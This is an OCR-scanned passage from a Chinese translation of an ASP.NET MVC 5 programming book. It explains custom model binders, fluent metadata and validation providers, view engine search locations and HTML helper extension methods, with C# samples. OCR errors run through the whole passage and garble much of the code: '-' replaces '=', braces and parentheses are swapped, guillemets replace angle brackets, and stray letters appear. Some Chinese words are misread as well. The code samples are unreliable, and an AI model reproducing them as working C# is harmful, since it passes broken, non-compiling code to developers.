
me)) 


if (!bindingContext.FallbackToEmptyPrefix) 
return null; 

bindingContext = new ModelBindingContext ( 
ModelMetadata = bindingContext.ModelMetadata, 
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ModelState = bindingContext.ModelState, 
PropertyFilter = bindingContext.PropertyFilter, 
ValueProvider = bindingContext.ValueProvider 
1 
l 


bindingContext.ModelMetadata.Model - new Point(); 


return new Point( 
Get«int»(controllerContext, bindingContext, "X"), 
Get«int»(controllerContext, bindingContext, "Y") 

f ); 

上 面 的 代码 在 原来 的 BindModel 版 本 基础 上 添加 了 两 项 新 内 容 : 

e 第 一 项 新 内 容 是 第 一 个 if 代 码 块 , 它 试图 在 回落 到 空前 绥 之 前 找到 带 有 名 称 前 绥 的 值 。 
当 系 统 开 始 模型 绑 定时 ， 模 型 参数 名 称 (在 示例 控制 器 是 pb 被 设置 为 bnding 
ContextModelName 中 的 值 。 查 看 值 提供 器 ， 以 确定 它们 是 否 包含 以 pt 开头 的 子 值 ， 如 
果 是 ， 它 们 就 是 要 使 用 的 值 。 假 如 拥有 一 个 名 为 pt 的 参数 ， 那 么 使 用 的 值 的 名 称 应 该 
是 pt.X 和 pt.Y 而 不 是 只 有 X， 或 只 有 Y。 然 而 ， 如 果 找 不 到 以 pt 开头 的 值 ， 就 需要 使 用 
名 称 中 只 有 XX 或 只 有 Y 的 值 。 

e 在 ModelMetadata 中 设置 了 一 个 Point 对 象 的 空 实例 。 之 所 以 这 样 做 ， 是 因为 大 部 分 验 
证 系统 包括 DataAnnotations， 都 期 望 看 到 一 个 容器 对 象 的 实例 ， 即 便 里 面 不 存放 任何 
实际 的 值 。 由 于 Get 方 法 调用 验证 ， 因 此 我 们 需要 提供 给 验证 系统 一 个 某 种 类 型 的 容 
器 对 象 ， 即 便 知道 它 不 是 最 终 容 器 。 

Get 方 法 有 几 个 片段 。 下 面 是 它 的 整个 函数 ， 后 面 将 对 其 进行 分 析 : 

private TModel Get<TModel>(ControllerContext controllerContext, 


ModelBindingContext bindingContext, 
string name) ( 


string fullName - name; 
if (!String.IsNullOrWhiteSpace (bindingContext.ModelName) 
fullName = bindingContext.ModelName + "." + name; 


ValueProviderResult valueProviderResult - 
bindingContext.ValueProvider.GetValue (fullName); 


ModelState modelState = new ModelState ( Value = valueProviderResult ); 
bindingContext.ModelState.Add(fullName, modelState); 


ModelMetadata metadata = bindingContext.PropertyMetadata [name]; 


string attemptedValue = valueProviderResult.AttemptedValue; 
if (metadata.ConvertEmptyStringToNull 
&& String.IsNullOrWhiteSpace (attemptedValue)) 
attemptedValue - null; 


TModel model; 
bool invalidValue - false; 
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try 
t 
model = (TModel)valueProviderResult.ConvertTo (typeof (TModel)); 
metadata.Model - model; 
} 
catch (Exception) 
{ 
model = default (TModel); 
metadata.Model = attemptedValue; 
invalidValue = true; 


} 


IEnumerable<ModelValidator> validators = 
ModelValidatorProviders.Providers.GetValidators( 
metadata, 
controllerContext 
E 


foreach (var validator in validators) 
foreach (var validatorResult in 
validator.Validate (bindingContext.Model) 
modelState.Errors.Add(validatorResult.Message); 


if (invalidValue && modelState.Errors.Count -- 0) 
modelState.Errors.Add( 
String.Format( 
"The value '(0)' is not a valid value for (1].", 
attemptedValue, 
metadata.GetDisplayName() 
) 
); 
return model; 
} 


下 面 逐 行 分 析 上 述 代码 : 
(1) 第 一 件 事情 就 是 从 值 提 供 器 中 检索 尝试 值 ， 并 在 模型 状态 中 记录 ， 以 便 用 户 可 以 看 


到 他 们 的 输入 值 ， 即 便 输入 值 是 在 模型 中 不 能 直接 包含 的 内 容 。 例 如 ， 用 户 在 只 允许 输入 整 
数 的 字段 输入 abc: 


string fullName = name; 


if (!String.IsNullOrWhiteSpace (bindingContext.ModelName) ) 
fullName = bindingContext.ModelName + "." + name; 


ValueProviderResult valueProviderResult 
bindingContext.ValueProvider.GetValue (fullName); 


ModelState modelState = new ModelState ( Value = valueProviderResult ); 
bindingContext.ModelState.Add(fullName, modelState); 


在 进行 深层 模型 绑 定 的 事件 中 ， 完 全 限定 名 会 预先 挂 起 (prepend) 当 前 模型 名 称 。 如 果 决 
定 在 另 一 个 类 ( 像 视图 模型 ) 的 内 部 使 用 一 个 Point 类 型 的 属性 ， 这 可 能 就 会 发 生 。 


(2) 一 旦 得 到 值 提供 器 的 返回 结果 , 我 们 就 必须 获得 一 个 描述 该 属性 模型 元 数据 的 副本 ， 
然后 再 决定 用 户 输入 值 的 内 容 : 
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ModelMetadata metadata = bindingContext.PropertyMetadata [name]; 


string attemptedValue - valueProviderResult.AttemptedValue; 
if (metadata.ConvertEmptyStringToNull 


&& String.IsNullOrWhiteSpace (attemptedValue)) 
attemptedValue - null; 


我 们 使 用 模型 元 数据 来 决定 是 否 将 空 字符 串 转 换 为 null。 由 于 当 用 户 没有 输入 任何 值 时 ， 
HTML 表单 总 是 提交 空 字符 串 而 不 是 null, 因此 这 一 转换 功能 默认 是 开启 的 。 通 常 可 以 编写 检 
查 要 求 值 的 验证 器 ， 使 得 null 通 不 过 验证 ， 而 让 空 字符 串通 过 验证 。 因 此 ， 开 发 人 员 可 以 在 
元 数据 中 设置 一 个 标志 来 允许 空 字符 串 放 在 字段 中 而 不 转换 成 null， 故 所 有 必要 验证 检查 都 
失败 。 


(3) 下 一 段 代 码 尝试 把 值 转换 为 目标 类 型 ， 并 记录 是 否 存在 转换 错误 。 无 论 采 用 哪 种 方 
式 ， 元 数据 中 都 需要 有 值 ， 以 便 验 证 器 有 值 进 行 验证 。 如 果 能 够 成 功 转换 该 值 ， 就 可 以 使 用 
该 值 ， 否 则 需要 使 用 尝试 值 ， 尽 管 知道 它 不 是 正确 类 型 。 


TModel model; 
bool invalidValue - false; 


try 

t 
model = (TModel)valueProviderResult.ConvertTo (typeof (TModel)); 
metadata.Model = model; 

t 

catch (Exception) 

t 
model - default (TModel); 
metadata.Model - attemptedValue; 
invalidValue - true; 

} 


这 里 记录 是 否 有 转换 失败 是 为 了 以 后 使 用 , 因为 我 们 想 在 没有 其 他 的 验证 失败 的 情况 下 ， 
添加 转换 失败 的 错误 提示 消息 。 例 如，required 的 值 通常 会 出 现 没有 填写 的 错误 或 数据 转换 失 
败 ， 但 required 的 验证 消息 是 正确 的 ， 所 以 我 们 想 让 它 有 较 高 的 优先 级 。 

(4) 运行 所 有 验证 器 ， 并 在 模型 状态 的 错误 集合 中 记录 每 一 个 验证 错误 : 

IEnumerable«ModelValidator» validators = 

ModelValidatorProviders.Providers.GetValidators( 
metadata, 
controllerContext 


) 


foreach (var validator in validators) 
foreach (var validatorResult in 
validator.Validate (bindingContext .Model) 
modelState.Errors.Add(validatorResult.Message); 


(5) 记录 数据 类 型 转换 错误 ， 如 果 发 生 失 败 并 且 没 有 其 他 验证 规则 失败 ， 就 返回 该 值 ， 
以 便 模型 绑 定 过 程 的 其 他 部 分 使 用 : 


if (invalidValue && modelState.Errors.Count == 0) 
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modelState.Errors.Add( 
String.Format( 
"The value '{0}' is not a valid value for {1}.", 
attemptedValue, 
metadata.GetDisplayName() 
) 
); 


return model; 

示例 中 包括 一 个 能 够 展示 模型 绑 定 器 应 用 情况 的 简单 控制 器 和 视图 ( 它 注册 在 区 域 注册 
文件 中 )。 本 例 禁用 了 客户 端 验 证 , 以 便 更 容易 地 观测 服务 器 端 逻辑 的 运行 , 并 对 其 进行 调试 。 
我 们 也 可 以 开启 视图 中 的 客户 端 验证 ， 以 确保 客户 端 验证 规则 正常 运行 。 


15.1.2 用 元 数据 描述 模型 


ASPNET MVC 2 中 引入 了 模型 元 数据 系统 ， 用 来 帮助 描述 用 于 协助 HTML 生 成 和 模型 验 
证 的 模型 元 数据 信息 。 模 型 元 数据 系统 提供 的 信息 包括 (但 不 局 限于 ) 以 下 问题 的 答案 : 

e 模型 的 种 类 是 什么 ? 

如 果 包 含 的 话 ， 包 含 的 模型 种 类 是 什么 ? 
包含 该 值 的 属性 名 称 是 什么 ? 

它 是 简单 类 型 还 是 复杂 类 型 ? 
显示 的 名 称 是 什么 ? 

如 何 格式 化 显示 的 值 ? 编辑 的 值 ? 

该 值 是 必需 的 吗 ? 

该 值 是 只 读 的 吗 ? 

e. 应 该 采用 什么 模板 来 显示 它 ? 

ASPNETMVC 支 持 通过 应 用 于 类 和 属性 的 特性 所 表示 的 模型 元 数据 。 这 些 特性 主要 包含 
在 名 称 空间 System.ComponentModel 和 System.ComponentModel.DataAnnotations 中 。 

在 NET 1.0 中 就 已 经 引入 了 ComponentModel 名 称 空间 , 它 最 初 只 是 设计 用 于 Visual Studio 
设计 器 ， 如 Web Forms 和 Windows Forms。DataAnnotations 类 在 NET 3.5 SP1 中 和 ASPNET 
Dynamic Data 一 起 被 引入 , 并 且 主要 和 模型 元 数据 一 起 使 用 。 DataAnnotations 类 在 NET4 有 了 
显著 增强 , 开始 被 WCF RIA 服 务 团队 使 用 , 同时 也 开始 移植 到 Silverlight 4 中 。 尽管 由 ASPNET 
团队 发 起 ， 但 它们 已 经 从 开始 的 设计 变 成 了 UI 表现 层 的 不 可 知 论 者 (agnostic)， 这 正 是 它们 在 
名 称 空间 System.ComponentModel 中 而 不 在 名 称 空间 System.Web 中 的 原因 。 

ASPNET MVC 提 供 了 一 个 可 插 拔 的 模型 元 数据 提供 器 系统 ， 如 果 不 想 使 用 DataAnnotations 特 
性 的 话 ， 我 们 可 以 提供 自己 的 元 数据 源 。 实 现 一 个 元 数据 提供 器 意味 着 需要 继承 类 
ModelMetadataProvider， 并 实现 其 中 的 三 个 抽象 方法 : 

e ”GetMetadataForType 返 回 关于 整个 类 的 元 数据 。 

e GetMetadataForProperty 返 回 类 上 单个 属性 的 元 数据 。 

e GetMetadataForProperties 返 回 类 上 所 有 属性 的 元 数据 。 

还 有 一 个 名 为 AssociatedMetadataProvider 的 派生 类 ， 可 以 被 计划 通过 特性 提供 元 数据 的 
元 数据 提供 器 使 用 。 它 把 上 述 三 个 方法 的 调用 压缩 到 对 CreateMetadata 方 法 的 调用 ， 并 传递 附 
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加 到 模型 和 /或 模型 属性 的 特性 列表 。 由 于 简化 的 API 和 对 元 数据 “兄弟 类 ”的 自动 支持 ， 
此 如 果 要 编写 用 特性 装饰 模型 的 元 数据 提供 器 ， 那 么 使 用 AssociatedMetadataProvider 作 为 提 
供 器 的 基 类 就 是 一 个 不 错 的 选择 。 

元 数据 示例 代码 在 目录 ~/Areas/FluentMetadata 下 包含 了 一 个 变数 (fluent) 元 数据 提供 器 的 
示例 。 这 个 提供 器 的 实现 十 分 复杂 ， 但 与 提供 给 最 终 用 户 的 元 数据 数量 相 比 ， 这 些 代 码 还 是 
简单 明了 的 。 由 于 ASPNETMVC 只 能 使 用 一 个 元 数据 提供 器 ， 因 此 该 例 继承 自 内 置 的 元 数 
据 提供 器 ， 以 便 用 户 可 以 混用 传统 的 元 数据 特性 和 动态 的 基于 代码 的 元 数据 。 

在 内 置 元 数据 特性 之 上 的 样 例 变数 元 数据 提供 器 具有 独特 的 优势 ， 它 可 以 用 来 描述 和 装 
饰 不 受 我 们 控制 的 类 。 对 于 传统 的 特性 方法 ， 当 编写 类 型 时 ， 特 性 必须 应 用 到 类 型 ， 对 于 像 
变数 元 数据 提供 器 的 方法 ， 类 型 描述 独立 于 类 型 定义 ， 这 样 我 们 就 可 以 把 规则 应 用 到 不 是 自 
己 定义 的 类 型 上 (例如 ，.NET 框 架 中 的 内 置 类 型 )。 

在 下 面 的 示例 中 ， 元 数据 在 区 域 注 册 函 数 内 注册 : 

ModelMetadataProviders.Current = 

new FluentMetadataProvider () 
.ForModel«Contact»() 

.ForProperty (m => m.FirstName) 
.DisplayName ("First Name") 
.DataTypeName ("string") 

-ForProperty (m => m.LastName) 
.DisplayName ("Last Name") 
.DataTypeName ("string") 

.ForProperty (m => m.EmailAddress) 


.DisplayName ("E-mail address") 
.DataTypeName ("email"); 


CreateMetadata 方 法 的 实现 首先 获取 继承 自 注解 特性 的 元 数据 , 然后 通过 开发 人 员 注 册 的 
修改 方法 (modifieD 修 改 这 些 数据 。 这 些 修改 方法 ( 像 DisplayName 的 调用 ) 简 单 地 记录 将 来 在 被 
请 求 后 对 ModelMetadata 对 象 所 做 的 修改 。 所 做 的 这 些 修改 存储 在 变数 提供 器 内 部 的 字典 中 ， 
以 便 我 们 以 后 在 CreateMetadata 中 使 用 ， 代 码 如 下 : 


protected override ModelMetadata CreateMetadata ( 
IEnumerable«Attribute» attributes, 
Type containerType, 
Func«object» modelAccessor, 
Type modelType, 
string propertyName) ( 


// Start with the metadata from the annotation attributes 
ModelMetadata metadata = 
base.CreateMetadata( 
attributes, 
containerType, 
modelAccessor, 
modelType, 
propertyName 
); 


// Look inside our modifier dictionary for registrations 
Tuple«Type, string» key = 
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propertyName == null 
? new Tuple«Type, string» (modelType, null) 
: new Tuple«Type, string» (containerType, propertyName); 


// Apply the modifiers to the metadata, if we found any 
List«Action«ModelMetadata»» modifierList; 
if (modifiers.TryGetValue(key, out modifierList)) 
foreach (Action«ModelMetadata» modifier in modifierList) 
modifier (metadata); 


return metadata; 
) 


该 元 数据 提供 器 的 实现 仅仅 是 一 个 映射 ， 要 么 是 为 了 修改 类 的 元 数据 ， 从 类 型 到 修改 函 
数 的 映射 ， 要么 就 是 为 了 修改 属性 的 元 数据 ， 从 类 型 + 属性 名 称 到 修改 函数 的 映射 。 虽然 有 
多 个 这 样 的 修改 函数 ， 但 它们 都 遵循 同样 的 基本 模式 ， 这 种 模式 是 指 在 提供 器 的 字典 中 注册 
修改 功能 ， 以 便 以 后 运行 。 下 面 是 DisplayName 修 改 函 数 的 实现 : 

public MetadataRegistrar<TModel> DisplayName (string displayName) 

{ 

provider.Add( 
typeof (TModel), 
propertyName, 
metadata => metadata.DisplayName = displayName 


); 


return this; 
} 


其 中 ，Add 方 法 调用 的 第 三 个 参数 是 作为 修改 方法 的 匿名 函数 :提供 一 个 元 数据 对 象 的 
实例 ,把 DisplayName 属 性 设置 为 开发 人 员 提供 的 显示 名 称 。 如 果 查 看 该 示例 的 完整 代码 , 包 
括 控制 器 和 视图 ， 它 就 会 一 起 展示 所 有 内 容 。 


15.1.3 ”验证 模型 


模型 验证 在 ASPNET MVC 1.0 中 已 经 引入 ， 但 是 直到 ASPNET MVC 2 时 才 引 入 可 插 拔 的 验 
证 提供 器 。ASPNET MVC 1.0 验 证 基于 IdataErrorInfo 接 口 ， 尽 管 该 接口 仍然 可 以 使 用 ， 但 是 
开发 人 员 应 该 考虑 废弃 它 。 使 用 ASPNETMVC 2 及 其 后 续 版 本 的 开发 人 员 可 以 在 模型 属性 上 使 
用 DataAnnotations 验 证 特性 。NET3.5 SP1 包 含 4 个 验证 特性 : [Required]. [Range]. [StringLength] 
和 [RegularExpression]。 开 发 人 员 可 使 用 基 类 ValidationAttribute 来 编写 自 定义 的 验证 逻辑 。 

CLR 团 队 在 NET 4 中 对 验证 系统 进行 了 增强 完善 ， 其 中 包括 新 的 TValidatableObject 接 口 。 
ASPNET MVC 3 添加 了 两 个 新 验证 器 : [Comparel] 和 [Remote]。 另 外 ， 如 果 MVC 4 及 更 高 版 本 
的 项 目 建立 在 .NET 4.5 框 架 之 上 , 那么 我 们 就 有 一 些 MVC 在 Data Annotations 中 支持 的 新 特性 ， 
这 与 使 用 jQuery Validate 的 新 验证 规则 集 相 匹配 ， 其 中 包括 [CreditCard]、[EmailAddress]、 
[FileExtensions]、[MaxLength]、[MinLength]、[Phone] 和 [Url]。 

第 6 章 已 深入 地 介绍 了 如 何 编写 自 定义 验证 器 ， 这 里 不 再 重复 。 相 反 ， 这 里 重点 探讨 编 
写 验 证 器 提供 器 更 高 级 的 主题 。 验 证 器 提供 器 允许 开发 人 员 引 入 新 的 验证 源 。ASPNET MVC 
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中 默认 安装 了 3 个 验证 器 提供 器 : 
e DataAnnotationsModelValidatorProvider 支 持 继承 自 ValidationAttribute 的 验证 器 和 实现 
了 接口 TValidatableObject 的 模型 。 
è DataErrorInfoModelValidatorProvider 支 持 实现 了 由 ASP.NETMVC 1.0 的 验证 层 使 用 的 
IDataErrorInfo 接 口 的 类 。 
e ClientDataTypeModelValidatorProvider 提 供 了 客户 端 验 证 对 内 置 数字 数据 类 型 的 支 
持 ， 像 整数 、 小 数 、 浮 点 数 和 日 期 等 。 

实现 验证 器 提供 器 意味 着 需要 继承 基 类 ModelValidatorProvider， 并 实现 返回 给 定 模型 的 
验证 器 的 方法 ， 给 定 模型 由 ModelMetadata 的 一 个 实例 和 ControllerContext 表 示 。 我 们 可 通过 
使 用 ModelValidatorProviders.Providers 来 注册 自 定义 的 模型 验证 器 提供 器 。 

在 目录 ~/Areas/FluentValidation 下 的 示例 代码 中 有 一 个 变数 模型 验证 系统 的 例子 。 几 乎 和 
变数 模型 元 数据 的 例子 一 样 ， 它 也 是 相当 复杂 的 ， 因 为 它 需 要 提供 一 些 验 证 函数 ， 但 是 实现 
验证 器 提供 器 的 大 部 分 代码 还 是 相当 简单 明了 的 。 

该 例 在 区 域 注册 函数 的 内 部 包括 变数 验证 注册 : 

ModelValidatorProviders.Providers.Add( 

new FluentValidationProvider() 
.ForModel«Contact»() 

.ForProperty(c -» c.FirstName) 
.Required() 
.StringLength (maxLength: 15 

-ForProperty(c => c.LastName) 
.Required(errorMessage: "You must provide the last name!") 
.StringLength (minLength: 3, maxLength: 20) 

.ForProperty(c -» c.EmailAddress) 
.Required() 
.StringLength (minLength: 10) 
.EmailAddress() 


Vy 


对 于 该 例 ， 我 们 已 经 实现 了 三 个 不 同 的 验证 器 ， 其 中 既 包 括 服务 器 端的 验证 支持 ， 也 包 
括 客户 端的 验证 支持 。 注 册 API 看 起 来 和 以 前 检查 的 模型 元 数据 变数 API 几 乎 相同 o 
GetValidators 的 实现 基于 一 个 从 请 求 类 型 和 可 选 属性 名 称 映射 到 验证 器 工厂 的 一 个 字典 : 


public override IEnumerable«ModelValidator» GetValidators( 
ModelMetadata metadata, 
ControllerContext context) ( 
IEnumerable«ModelValidator» 
results = Enumerable.Empty«ModelValidator»(); 


if (metadata.PropertyName !- null) 
results = GetValidators (metadata, 
context, 


metadata.ContainerType, 
metadata.PropertyName); 


return results.Concat( 
GetValidators (metadata, 
context, 
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metadata.ModelType) 
考虑 到 ASPNET MVC 框 架 支持 多 个 验证 器 提供 器 ， 所 以 我 们 没 必要 继承 或 委托 现 有 的 


验证 提供 器 。 我 们 只 需要 添加 自己 合适 的 唯一 的 验证 规则 。 适 用 于 特定 属性 的 验证 器 是 那些 
也 适用 于 属性 自身 和 它 的 类 型 的 验证 器 ， 例 如 ， 假 设 有 如 下 模型 : 


public class Contact 
{ 


public string FirstName { get; set; 
public string LastName ( get; set; ) 
public string EmailAddress ( get; set; } 
) 


当 为 FirstName 请 求 验证 规则 时 ， 系 统 会 提供 那些 适用 于 FirstName 属 性 自身 或 
System.String( 因 为 这 是 FirstName 的 类 型 ) 的 规则 。 
上 面 例子 中 使 用 的 私有 GetValidators 方 法 的 实现 经 过 修改 后 ， 代 码 如 下 : 


private IEnumerable<ModelValidator> GetValidators( 
ModelMetadata metadata, 
ControllerContext context, 
Type type, 
string propertyName - null) 


var key = new Tuple«Type, string» (type, propertyName); 
List«ValidatorFactory» factories; 
if (validators.TryGetValue(key, out factories)) 
foreach (var factory in factories) 
yield return factory (metadata, context); 
Li 


修改 后 的 代码 会 查找 已 经 使 用 提供 器 注册 的 所 有 验证 器 工厂 。 我 们 在 注册 中 看 到 的 像 
Required 和 StringLength 等 函数 是 用 来 注册 这 些 验证 器 工厂 的 。 所 有 这 些 函 数 往往 都 遵循 相同 
的 模式 ， 如 下 所 示 : 


public ValidatorRegistrar«TModel» Required( 
string errorMessage - "(0) is required") 


t 
provider.Add( 
typeof (TModel), 
propertyName, 
(metadata, context) => 
new RequiredValidator (metadata, context, errorMessage) 
); 


return this; 
H 
provider. Add 调 用 的 第 三 个 参数 是 作为 验证 器 工厂 的 匿名 函数 。 输 入 模型 元 数据 和 控制 器 
上 下 文 ， 它 将 返回 一 个 继承 了 ModelValidator 类 的 实例 。 
MVC 可 理解 基 类 ModelValidator， 并 使 用 它 来 进行 验证 。 我 们 可 以 在 前 面 模 型 绑 定 器 的 
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示例 中 看 到 ModelValidator 类 的 隐 式 用 法 ， 因 为 当 创建 和 绑 定 对 象 时 ， 最 终 是 由 模型 绑 定 器 
负责 执行 验证 。 我 们 正在 使 用 的 RequiredValidator 实 现 有 两 个 主要 任务 : 执行 服务 器 端 验证 和 
返回 关于 客户 端 验 证 的 元 数据 ， 实 现代 码 如 下 所 示 : 


private class RequiredValidator : ModelValidator { 
private string errorMessage; 


public RequiredValidator (ModelMetadata metadata, 
ControllerContext context, 
string errorMessage) : base(metadata, context) { 
this.errorMessage - errorMessage; 
) 


private string ErrorMessage ( 
get ( 
return String.Format (errorMessage, Metadata.GetDisplayName()); 
H 
) 


public override IEnumerable«ModelClientValidationRule» 
GetClientValidationRules() ( 
yield return new ModelClientValidationRequiredRule (ErrorMessage); 
) 


public override IEnumerable«ModelValidationResult» Validate (object 
container) ( 
if (Metadata.Model -- null) 
yield return new ModelValidationResult ( Message = ErrorMessage ); 
) 
) 


整个 示例 包括 三 个 验证 规则 Required、StringLength 和 EmailAddress) 的 实现 , 涵盖 了 模型 、 
控制 器 和 视图 ， 展 示 了 它们 一 起 工作 的 情景 。 客 户 端 验 证 被 默认 关闭 ， 以 便 验 证 和 调试 服务 
器 端 验证 。 当 然 ， 我 们 可 以 从 视图 中 删除 那 行 代码 来 重新 启用 客户 端 验证 ， 以 了 解 它 的 工作 
原理 。 


15.2 ”视图 扩展 


视图 是 操作 返回 结果 的 最 常见 类 型 。 视 图 通常 是 带 有 一 些 代码 的 模板 ， 可 以 用 来 根据 输 
入 (模型 ) 自 定义 输出 。ASPNET MVC 默 认 安装 了 两 个 视图 引擎 : 即 在 ASPNET MVC 1.0 中 就 
已 经 有 了 的 WebForms 视 图 引擎 和 Razor 视 图 引擎 (ASPNETMVC 3 的 新 内 容 )。 此 外 , ASPNET 
MVC 应 用 程序 还 可 以 使 用 一 些 第 三 方 视图 引擎 ， 其 中 包括 Spark、NHaml 和 NVelocity 等 。 


15.2.1 自 定义 视图 引擎 


关于 编写 自 定义 视图 引擎 的 话题 可 以 编写 成 一 整 本 书 ， 不 过 说 实话 很 少 有 人 会 买 ， 因 为 
从 零 编写 视图 引擎 并 不 是 大 多 数 人 需要 完成 的 任务 ; 再 者 ， 现 在 还 有 丰富 的 功能 视图 引擎 源 代 
码 可 以 让 这 些 用 户 在 此 基础 上 进行 编写 。 因 此 ， 本 节 着 重 介 绍 ASPNETMVC 自 带 的 两 个 视图 
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引擎 的 定制 。 

这 两 个 视图 引擎 类 一 一 WebFormViewEngine 和 RazorViewEngine 一 一 都 派生 于 基 类 
BuildManagerViewEngine ， 而 基 类 BuildManagerViewEngine X. YR 4# F1 4 % VirtualPathProvider- 
ViewEngine. 创建 管理 器 (build manageD 和 虚拟 路 径 提 供 器 (virtual path provideD 是 ASPNET 核 心 
运行 时 内 部 的 功能 。 创 建 管理 器 用 来 定位 磁盘 上 的 文件 路 径 ( 像 后 级 名 为 .aspx 和 .cshtml 的 文件 ) 
并 把 定位 到 的 这 些 文件 转换 成 源 代码 ， 并 编译 这 些 代码 。 虚 拟 路 径 提供 器 可 以 帮助 定位 任何 
类 型 的 文件 ; 默认 情况 下 ， 系 统 查 找 磁 盘 上 的 文件 , 但 开发 人 员 也 可 以 用 从 其 他 地 方 (如 从 数 
据 库 中 或 从 嵌入 的 资源 中 ) 加 载 视图 内 容 的 路 径 提供 器 蔡 代 虚拟 路 径 提供 器 。 如 有 必要 ,这 两 
个 视图 引擎 基 类 人 允许 开发 人 员 蔡 换 创建 管理 器 与 /或 虚拟 路 径 提 供 器 。 

一 个 比较 常见 的 替代 方案 是 修改 视图 引擎 在 磁盘 上 查找 文件 的 位 置 。 按 照 约定 ， 视 图 引 
擎 通常 在 以 下 位 置 查找 文件 : 

^/Areas/AreaName/Views/ControllerName 

^/Areas/AreaName/Views/Shared 


^/Niews/ControllerName 
^/Niews/Shared 


这 些 位 置 在 视图 引擎 的 构造 函数 运行 期 间 就 设置 到 了 它 的 属性 集合 中 ， 因 此 ， 开 发 人 员 
可 以 创建 一 个 继承 自 他们 选择 的 视图 引擎 的 新 视图 引擎 ， 并 在 创建 过 程 中 重 写 这 些 位置 。 以 
下 代码 展示 了 WebFormViewEngine 的 某 个 构造 函数 的 相关 代码 : 
AreaMasterLocationFormats = new string[] ( 


"^/Areas/(2) /Views/(1)/(0) .master", 
"^/Areas/(2) /Views/Shared/(0) .master" 


n 

AreaViewLocationFormats = new string[] ( 
"^/Areas/(2) /Views/(1)/(0) .aspx", 
"^/Areas/(2) /Views/(1)/(0).ascx", 
"^/Areas/(2) /Views/Shared/(0].aspx", 
"^/Areas/(2) /Views/Shared/(0).ascx" 

n 

AreaPartialViewLocationFormats = AreaViewLocationFormats; 

MasterLocationFormats = new string[] { 
"^/Views/(1)/(0) .master", 
"^/Views/Shared/(0).master" 

n 

ViewLocationFormats - new string[] ( 
"^«/Views/(1)/1(0) .aspx", 
"^«/Views/(1)/(0).ascx", 
"^«/Views/Shared/(0).aspx", 
"^/Views/Shared/(0).ascx" 

n 

PartialViewLocationFormats = ViewLocationFormats; 


这 些 字符 串通 过 String .Format 发 送 ， 并 且 传 递 过 来 的 参数 是 : 


(0) = 视图 名 称 
{1} = 控制 器 名 称 
(23 = 区 域名 称 


通过 这 些 字符 串 ， 开 发 人 员 可 以 修改 视图 位 置 的 约定 。 例 如 ， 只 想 把 .aspx 文 件 作为 完整 


365 


ASP.NET MVC 5 高 级 编程 (第 5 版 ) 


视图 对 待 ， 而 把 .ascx 文 件 作为 部 分 视图 对 待 。 这 就 需要 两 个 视图 拥有 相同 的 名 称 ， 却 具有 不 
同 的 扩展 名 ,根据 请 求 的 视图 类 型 (完整 或 部 分 ) 来 决定 具体 泻 染 哪个 视图 。 
Razor 视 图 引擎 的 构造 函数 的 内 部 代码 类 似 于 如 下 代码 : 


AreaMasterLocationFormats = new string[] { 
"^/Areas/(2) /Views/(1)/(0) .cshtml", 
"^/Areas/(2) /Views/(1)/(0) .vbhtml", 
"^/Areas/(2) /Views/Shared/(0]).cshtml", 
"^/Areas/(2) /Views/Shared/(0].vbhtml" 
n 
AreaViewLocationFormats = AreaMasterLocationFormats; 
AreaPartialViewLocationFormats = AreaMasterLocationFormats; 


MasterLocationFormats = new string[] ( 
"^/Views/(1)/(0) .cshtml", 
"«/Niews/(1)/(0) .vbhtml", 
"^«/Views/Shared/(0).cshtml", 
"^«/Views/Shared/(0).vbhtml" 

}; 

ViewLocationFormats = MasterLocationFormats; 

PartialViewLocationFormats = MasterLocationFormats; 


上 面 代码 与 前 面 的 代码 的 细微 区 别 在 于 ，Razor 使 用 了 文件 扩展 名 来 区 分 编程 语言 (C# 和 
VB)， 它 没有 针对 母 版 视图 、 视 图 和 部 分 视图 的 独立 文件 类 型 ， 也 没有 针对 页 面 与 控制 的 独 
立 文 件 类 型 ， 之 所 以 这 样 ， 是 因为 Razor 中 不 存在 这 样 的 结构 。 

一 旦 自 定义 了 视图 引擎 ， 就 需要 让 MVC 使 用 它 。 另 外 ， 还 需要 删除 要 替换 的 现 有 视图 引 
擎 ,我 们 需要 在 Global.asax 文 件 中 配置 MVC( 或 者 通过 使 用 MVC 5 默认 模板 的 App_Start 文 件 夹 
下 的 一 个 Config 类 )。 

例如 ， 如 果 要 使 用 自 定义 的 视图 引擎 替换 Razor 视 图 引擎 ， 我 们 需要 如 下 所 示 的 代码 : 


var razorEngine = ViewEngines.Engines 
.SingleOrDefault (ve => ve is RazorViewEngine); 


if (razorEngine != null) 
viewEngines .Engines .Remove (razorEngine); 


ViewEngines.Engines.Add (new MyRazorViewEngine()); 


上 面 代码 使 用 了 LINQ 语 法 来 判定 Razor 视 图 引擎 是 否 已 经 安装 (删除 Razor 需 要 这 些 信 
息 )， 然 后 添加 自 定义 的 新 Razor 视 图 引擎 的 实例 。 请 记 住 ， 视 图 引擎 是 按 顺 序 执行 的 ， 因 此 ， 
想 要 让 新 的 Razor 视 图 引擎 先 于 注册 的 其 他 视图 引擎 运行 ,我 们 就 不 需要 使 用 Add 方法 ,而 使 
用 .Insert 方 法 ， 并 且 确 保 插 入 的 索引 位 置 是 0， 以 确保 它 在 第 一 位 。 


15.2.2 ”编写 HTML 辅 助 方法 


HIML 辅助 方法 主要 用 来 在 视图 中 生成 HIML 标记 。 它 们 通常 作为 HtmlHelper、AjaxHelper 
或 UrlHelper 类 的 扩展 方法 来 编写 ， 具 体 作为 哪 一 个 类 的 扩展 方法 则 根据 要 生成 的 内 容 来 确定 : 
是 纯 HTML， 是 支持 Ajax 的 HTML 还 是 URL。HTML 和 Ajax 辅助 方法 可 以 访问 ViewContext， 因 为 
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它们 只 能 从 视图 中 调用 ， 而 URI 辅助 方法 可 以 访问 ControllerContext， 因 为 它们 既 可 以 从 控制 器 
中 调用 ， 也 可 以 从 视图 中 调用 。 
扩展 方法 是 静态 类 中 的 静态 方法 , 它们 通过 其 第 一 个 参数 上 的 this 关 键 字 来 告知 编译 器 它 
们 提供 的 扩展 类 型 。 例 如 ， 如 果 想 为 HtmlHelper 类 提供 一 个 没有 参数 的 扩展 方法 ， 我 们 可 能 
编写 如 下 的 代码 : 
public static class MyExtensions { 
public static string MyExtensionMethod(this HtmlHelper html) ( 


return "Hello, world!"; 
) 


) 


我 们 仍 可 以 使 用 传统 方式 ( 即 通 过 调用 MyExtensions.MyExtensionMethod(Html)) 来 调用 该 
方法 ,但 是 使 用 扩展 语法 ( 即 通过 调用 Html.MyExtensionMethod()) 可 以 更 加 方便 地 调用 它 。 提 
